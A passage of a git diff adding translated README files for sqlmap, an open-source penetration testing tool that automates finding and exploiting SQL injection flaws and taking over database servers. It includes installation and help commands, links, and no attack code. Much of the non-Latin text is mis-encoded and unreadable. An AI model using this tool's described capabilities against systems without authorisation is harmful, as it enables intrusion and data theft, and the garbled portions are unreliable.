სáƒáƒ®áƒ”ლმძღვáƒáƒœáƒ”ლáƒ](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +ბმულები +---- + +* სáƒáƒ¬áƒ§áƒ˜áƒ¡áƒ˜ გვერდი: https://sqlmap.org +* ჩáƒáƒ›áƒáƒ¢áƒ•ირთვáƒ: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) áƒáƒœ [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS áƒáƒ áƒ®áƒ˜: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* პრáƒáƒ‘ლემებისáƒáƒ—ვის თვáƒáƒšáƒ§áƒ£áƒ áƒ˜áƒ¡ დევნებáƒ: https://github.com/sqlmapproject/sqlmap/issues +* მáƒáƒ›áƒ®áƒ›áƒáƒ áƒ”ბლის სáƒáƒ®áƒ”ლმძღვáƒáƒœáƒ”ლáƒ: https://github.com/sqlmapproject/sqlmap/wiki +* ხშირáƒáƒ“ დáƒáƒ¡áƒ›áƒ£áƒšáƒ˜ კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* დემáƒáƒœáƒ¡áƒ¢áƒ áƒáƒªáƒ˜áƒ”ბი: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* ეკრáƒáƒœáƒ˜áƒ¡ áƒáƒœáƒáƒ‘ეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ko-KR.md b/doc/translations/README-ko-KR.md new file mode 100644 index 00000000000..2542209833e --- /dev/null +++ b/doc/translations/README-ko-KR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmapì€ SQL ì¸ì ì…˜ 결함 íƒì§€ ë° í™œìš©, ë°ì´í„°ë² ì´ìФ 서버 장악 프로세스를 ìžë™í™” 하는 오픈소스 침투 테스팅 ë„구입니다. ìµœê³ ì˜ ì¹¨íˆ¬ 테스터, ë°ì´í„°ë² ì´ìФ 핑거프린팅 부터 ë°ì´í„°ë² ì´ìФ ë°ì´í„° ì½ê¸°, 대역 외 ì—°ê²°ì„ í†µí•œ 기반 íŒŒì¼ ì‹œìŠ¤í…œ ì ‘ê·¼ ë° ëª…ë ¹ì–´ ì‹¤í–‰ì— ê±¸ì¹˜ëŠ” 광범위한 ìŠ¤ìœ„ì¹˜ë“¤ì„ ìœ„í•œ 강력한 íƒì§€ 엔진과 ë‹¤ìˆ˜ì˜ íŽ¸ë¦¬í•œ ê¸°ëŠ¥ì´ íƒ‘ìž¬ë˜ì–´ 있습니다. + +스í¬ë¦°ìƒ· +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +ë˜ëŠ”, wikiì— ë‚˜ì™€ìžˆëŠ” 몇몇 ê¸°ëŠ¥ì„ ë³´ì—¬ì£¼ëŠ” [스í¬ë¦°ìƒ· 모ìŒ](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) ì„ ë°©ë¬¸í•˜ì‹¤ 수 있습니다. + +설치 +---- + +[여기](https://github.com/sqlmapproject/sqlmap/tarball/master)를 í´ë¦­í•˜ì—¬ 최신 ë²„ì „ì˜ tarball 파ì¼, ë˜ëŠ” [여기](https://github.com/sqlmapproject/sqlmap/zipball/master)를 í´ë¦­í•˜ì—¬ 최신 zipball 파ì¼ì„ 다운받으실 수 있습니다. 
+ +가장 선호ë˜ëŠ” 방법으로, [Git](https://github.com/sqlmapproject/sqlmap) 저장소를 복제하여 sqlmapì„ ë‹¤ìš´ë¡œë“œ í•  수 있습니다: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmapì€ [Python](https://www.python.org/download/) 버전 **2.7** 그리고 **3.x** ì„ í†µí•´ 모든 í”Œëž«í¼ ìœ„ì—서 사용 가능합니다. + +사용법 +---- + +기본 옵션과 스위치 목ë¡ì„ 보려면 ë‹¤ìŒ ëª…ë ¹ì–´ë¥¼ 사용하세요: + + python sqlmap.py -h + +ì „ì²´ 옵션과 스위치 목ë¡ì„ 보려면 ë‹¤ìŒ ëª…ë ¹ì–´ë¥¼ 사용하세요: + + python sqlmap.py -hh + +[여기](https://asciinema.org/a/46601)를 통해 사용 ìƒ˜í”Œë“¤ì„ í™•ì¸í•  수 있습니다. +sqlmapì˜ ëŠ¥ë ¥, ì§€ì›ë˜ëŠ” 기능과 모든 옵션과 ìŠ¤ìœ„ì¹˜ë“¤ì˜ ëª©ë¡ì„ 예제와 함께 보려면, [ì‚¬ìš©ìž ë§¤ë‰´ì–¼](https://github.com/sqlmapproject/sqlmap/wiki/Usage)ì„ ì°¸ê³ í•˜ì‹œê¸¸ 권장드립니다. + +ë§í¬ +---- + +* 홈페ì´ì§€: https://sqlmap.org +* 다운로드: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS 피드 커밋: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* ì‚¬ìš©ìž ë§¤ë‰´ì–¼: https://github.com/sqlmapproject/sqlmap/wiki +* ìžì£¼ 묻는 질문 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* 트위터: [@sqlmap](https://x.com/sqlmap) +* 시연 ì˜ìƒ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* 스í¬ë¦°ìƒ·: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-nl-NL.md b/doc/translations/README-nl-NL.md new file mode 100644 index 00000000000..f114168410d --- /dev/null +++ b/doc/translations/README-nl-NL.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap is een open source penetratie test tool dat het proces automatiseert van het detecteren en exploiteren van SQL injectie fouten en het overnemen van database servers. Het wordt geleverd met een krachtige detectie-engine, vele niche-functies voor de ultieme penetratietester, en een breed scala aan switches, waaronder database fingerprinting, het overhalen van gegevens uit de database, toegang tot het onderliggende bestandssysteem, en het uitvoeren van commando's op het besturingssysteem via out-of-band verbindingen. + +Screenshots +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Je kunt de [collectie met screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) bezoeken voor een demonstratie van sommige functies in the wiki. + +Installatie +---- + +Je kunt de laatste tarball installeren door [hier](https://github.com/sqlmapproject/sqlmap/tarball/master) te klikken of de laatste zipball door [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) te klikken. + +Bij voorkeur, kun je sqlmap downloaden door de [Git](https://github.com/sqlmapproject/sqlmap) repository te clonen: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap werkt op alle platformen met de volgende [Python](https://www.python.org/download/) versies: **2.7** en **3.x**. 
+ +Gebruik +---- + +Om een lijst van basisopties en switches te krijgen gebruik: + + python sqlmap.py -h + +Om een lijst van alle opties en switches te krijgen gebruik: + + python sqlmap.py -hh + +Je kunt [hier](https://asciinema.org/a/46601) een proefrun vinden. +Voor een overzicht van de mogelijkheden van sqlmap, een lijst van ondersteunde functies, en een beschrijving van alle opties en switches, samen met voorbeelden, wordt u aangeraden de [gebruikershandleiding](https://github.com/sqlmapproject/sqlmap/wiki/Usage) te raadplegen. + +Links +---- + +* Homepage: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) of [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Probleem tracker: https://github.com/sqlmapproject/sqlmap/issues +* Gebruikers handleiding: https://github.com/sqlmapproject/sqlmap/wiki +* Vaak gestelde vragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pl-PL.md b/doc/translations/README-pl-PL.md new file mode 100644 index 00000000000..e7b145e96b8 --- /dev/null +++ b/doc/translations/README-pl-PL.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap to open sourceowe narzÄ™dzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odpornoÅ›ci serwerów SQL na podatność na iniekcjÄ™ niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji poczÄ…wszy od identyfikacji bazy danych, poprzez wydobywanie z niej danych, a nawet pozwalajÄ…cych na dostÄ™p do systemu plików oraz wykonywanie poleceÅ„ w systemie operacyjnym serwera poprzez niestandardowe połączenia. + +Zrzuty ekranu +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Możesz odwiedzić [kolekcjÄ™ zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrujÄ…cÄ… na wiki niektóre możliwoÅ›ci. + +Instalacja +---- + +Najnowsze tarball archiwum jest dostÄ™pne po klikniÄ™ciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po klikniÄ™ciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Można również pobrać sqlmap klonujÄ…c rezozytorium [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +do użycia sqlmap potrzebny jest [Python](https://www.python.org/download/) w wersji **2.7** lub **3.x** na dowolnej platformie systemowej. 
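+ +As a quick, illustrative sanity check of a fresh clone (a sketch only; `--version` is sqlmap's standard version switch), you can confirm that the tool starts correctly: + +    python sqlmap.py --version + +A clone obtained with `git clone` can later be kept current by running a plain `git pull` inside the `sqlmap-dev` directory. +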
+ +Sposób użycia +---- + +Aby uzyskać listÄ™ podstawowych funkcji i parametrów użyj polecenia: + + python sqlmap.py -h + +Aby uzyskać listÄ™ wszystkich funkcji i parametrów użyj polecenia: + + python sqlmap.py -hh + +PrzykÅ‚adowy wynik dziaÅ‚ania można znaleźć [tutaj](https://asciinema.org/a/46601). +Aby uzyskać listÄ™ wszystkich dostÄ™pnych funkcji, parametrów oraz opisów ich dziaÅ‚ania wraz z przykÅ‚adami użycia sqlmap zalecamy odwiedzić [instrukcjÄ™ użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +OdnoÅ›niki +---- + +* Strona projektu: https://sqlmap.org +* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) lub [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ZgÅ‚aszanie błędów: https://github.com/sqlmapproject/sqlmap/issues +* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki +* CzÄ™sto zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Zrzuty ekranu: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pt-BR.md b/doc/translations/README-pt-BR.md new file mode 100644 index 00000000000..9f5ebfd9938 --- /dev/null +++ b/doc/translations/README-pt-BR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap é uma ferramenta de teste de intrusão, de código aberto, que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de intrusão por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional. + +Imagens +---- + +![Imagem](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki. + +Instalação +---- + +Você pode baixar o arquivo tar mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master). + +De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funciona em [Python](https://www.python.org/download/) nas versões **2.7** e **3.x** em todas as plataformas. 
+ +Como usar +---- + +Para obter uma lista das opções básicas faça: + + python sqlmap.py -h + +Para obter a lista completa de opções faça: + + python sqlmap.py -hh + +Você pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601). +Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki). + +Links +---- + +* Homepage: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki +* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demonstrações: [#1](https://www.youtube.com/user/inquisb/videos) e [#2](https://www.youtube.com/user/stamparm/videos) +* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-rs-RS.md b/doc/translations/README-rs-RS.md new file mode 100644 index 00000000000..e130727feaa --- /dev/null +++ b/doc/translations/README-rs-RS.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te širokim spektrom opcija od onih za prepoznavanje baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvršavanja komandi na operativnom sistemu korišćenjem tzv. "out-of-band" veza. + +Slike +---- + +![Slika](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Možete posetiti [kolekciju slika](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gde su demonstrirane neke od funkcija na wiki stranicama. + +Instalacija +---- + +Možete preuzeti najnoviji tarball klikom [ovde](https://github.com/sqlmapproject/sqlmap/tarball/master) ili najnoviji zipball klikom [ovde](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Opciono, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap radi bez posebnih zahteva korišćenjem [Python](https://www.python.org/download/) verzije **2.7** i/ili **3.x** na bilo kojoj platformi.
+ +Korišćenje +---- + +Kako biste dobili listu osnovnih opcija i prekidaÄa koristite: + + python sqlmap.py -h + +Kako biste dobili listu svih opcija i prekidaÄa koristite: + + python sqlmap.py -hh + +Možete pronaći primer izvrÅ¡avanja [ovde](https://asciinema.org/a/46601). +Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih funkcija, te opis svih opcija i prekidaÄa, zajedno s primerima, preporuÄen je uvid u [korisniÄki priruÄnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Linkovi +---- + +* PoÄetna stranica: https://sqlmap.org +* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed promena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues +* KorisniÄki priruÄnik: https://github.com/sqlmapproject/sqlmap/wiki +* NajÄešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Slike: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ru-RU.md b/doc/translations/README-ru-RU.md new file mode 100644 index 00000000000..38147222530 --- /dev/null +++ b/doc/translations/README-ru-RU.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap - Ñто инÑтрумент Ð´Ð»Ñ Ñ‚ÐµÑÑ‚Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ ÑƒÑзвимоÑтей Ñ Ð¾Ñ‚ÐºÑ€Ñ‹Ñ‚Ñ‹Ð¼ иÑходным кодом, который автоматизирует процеÑÑ Ð¾Ð±Ð½Ð°Ñ€ÑƒÐ¶ÐµÐ½Ð¸Ñ Ð¸ иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¾ÑˆÐ¸Ð±Ð¾Ðº SQL-инъекций и захвата Ñерверов баз данных. Он оÑнащен мощным механизмом обнаружениÑ, множеÑтвом приÑтных функций Ð´Ð»Ñ Ð¿Ñ€Ð¾Ñ„ÐµÑÑионального теÑтера уÑзвимоÑтей и широким Ñпектром Ñкриптов, которые упрощают работу Ñ Ð±Ð°Ð·Ð°Ð¼Ð¸ данных, от Ñбора данных из базы данных, до доÑтупа к базовой файловой ÑиÑтеме и Ð²Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´ в операционной ÑиÑтеме через out-of-band Ñоединение. + +Скриншоты +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Ð’Ñ‹ можете поÑетить [набор Ñкриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонÑтрируемые некоторые функции в wiki. + +УÑтановка +---- + +Ð’Ñ‹ можете Ñкачать поÑледнюю верÑию tarball, нажав [Ñюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или поÑледний zipball, нажав [Ñюда](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Предпочтительно вы можете загрузить sqlmap, ÐºÐ»Ð¾Ð½Ð¸Ñ€ÑƒÑ [Git](https://github.com/sqlmapproject/sqlmap) репозиторий: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работает из коробки Ñ [Python](https://www.python.org/download/) верÑии **2.7** и **3.x** на любой платформе. 
+ +ИÑпользование +---- + +Чтобы получить ÑпиÑок оÑновных опций и вариантов выбора, иÑпользуйте: + + python sqlmap.py -h + +Чтобы получить ÑпиÑок вÑех опций и вариантов выбора, иÑпользуйте: + + python sqlmap.py -hh + +Ð’Ñ‹ можете найти пробный запуÑк [тут](https://asciinema.org/a/46601). +Чтобы получить обзор возможноÑтей sqlmap, ÑпиÑок поддерживаемых функций и опиÑание вÑех параметров и переключателей, а также примеры, вам рекомендуетÑÑ Ð¾Ð·Ð½Ð°ÐºÐ¾Ð¼Ð¸Ñ‚ÑÑ Ñ [пользовательÑким мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +СÑылки +---- + +* ОÑновной Ñайт: https://sqlmap.org +* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новоÑтей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ОтÑлеживание проблем: https://github.com/sqlmapproject/sqlmap/issues +* ПользовательÑкий мануал: https://github.com/sqlmapproject/sqlmap/wiki +* ЧаÑто задаваемые вопроÑÑ‹ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Демки: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-sk-SK.md b/doc/translations/README-sk-SK.md new file mode 100644 index 00000000000..d673b3e3aa8 --- /dev/null +++ b/doc/translations/README-sk-SK.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap je open source nástroj na penetraÄné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekÄným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetraÄného testera a Å¡irokou Å¡kálou prepínaÄov vrátane odtlaÄkov databázy, cez naÄítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operaÄnom systéme prostredníctvom mimopásmových pripojení. + +Snímky obrazovky +---- + +![snímka obrazovky](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Môžete navÅ¡tíviÅ¥ [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonÅ¡truuje niektoré funkcie na wiki. + +InÅ¡talácia +---- + +Najnovší tarball si môžete stiahnuÅ¥ kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master). + +NajlepÅ¡ie je stiahnuÅ¥ sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.7** a **3.x** na akejkoľvek platforme. 
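The usage sections in these READMEs only show the `-h`/`-hh` help listings. As a sketch of a scripted, unattended run, sqlmap's standard `-u` (target URL) and `--batch` (accept default answers) switches can be driven from Python; the URL below is a placeholder, not a real endpoint:

    # Sketch of an unattended run; http://target.example/?id=1 is a hypothetical target.
    import subprocess
    import sys

    subprocess.call([
        sys.executable, "sqlmap.py",
        "-u", "http://target.example/?id=1",  # placeholder test URL
        "--batch",                            # answer all prompts with defaults
    ])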
+ +Využitie +---- + +Na získanie zoznamu základných možností a prepínaÄov, použite: + + python sqlmap.py -h + +Na získanie zoznamu vÅ¡etkých možností a prepínaÄov, použite: + + python sqlmap.py -hh + +Vzorku behu nájdete [tu](https://asciinema.org/a/46601). +Ak chcete získaÅ¥ prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis vÅ¡etkých možností a prepínaÄov spolu s príkladmi, odporúÄame vám nahliadnuÅ¥ do [Používateľskej príruÄky](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Linky +---- + +* Domovská stránka: https://sqlmap.org +* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* SledovaÄ problémov: https://github.com/sqlmapproject/sqlmap/issues +* Používateľská príruÄka: https://github.com/sqlmapproject/sqlmap/wiki +* ÄŒasto kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots \ No newline at end of file diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md new file mode 100644 index 00000000000..46e5267e9e0 --- /dev/null +++ b/doc/translations/README-tr-TR.md @@ -0,0 +1,53 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap geliÅŸmiÅŸ tespit özelliÄŸinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek birçok aracı, uzak veritabanından, veri indirmek, dosya sistemine eriÅŸmek, dosya çalıştırmak gibi iÅŸlevleri de barındırmaktadır. + + +Ekran görüntüleri +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +İsterseniz özelliklerin tanıtımının yapıldığı [ekran görüntüleri](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. + + +Kurulum +---- + +[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipball'ı indirebilirsiniz. + +Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir. + +Kullanım +---- + + +Bütün basit seçeneklerin listesini gösterir + + python sqlmap.py -h + +Bütün seçenekleri gösterir + + python sqlmap.py -hh + +Program ile ilgili örnekleri 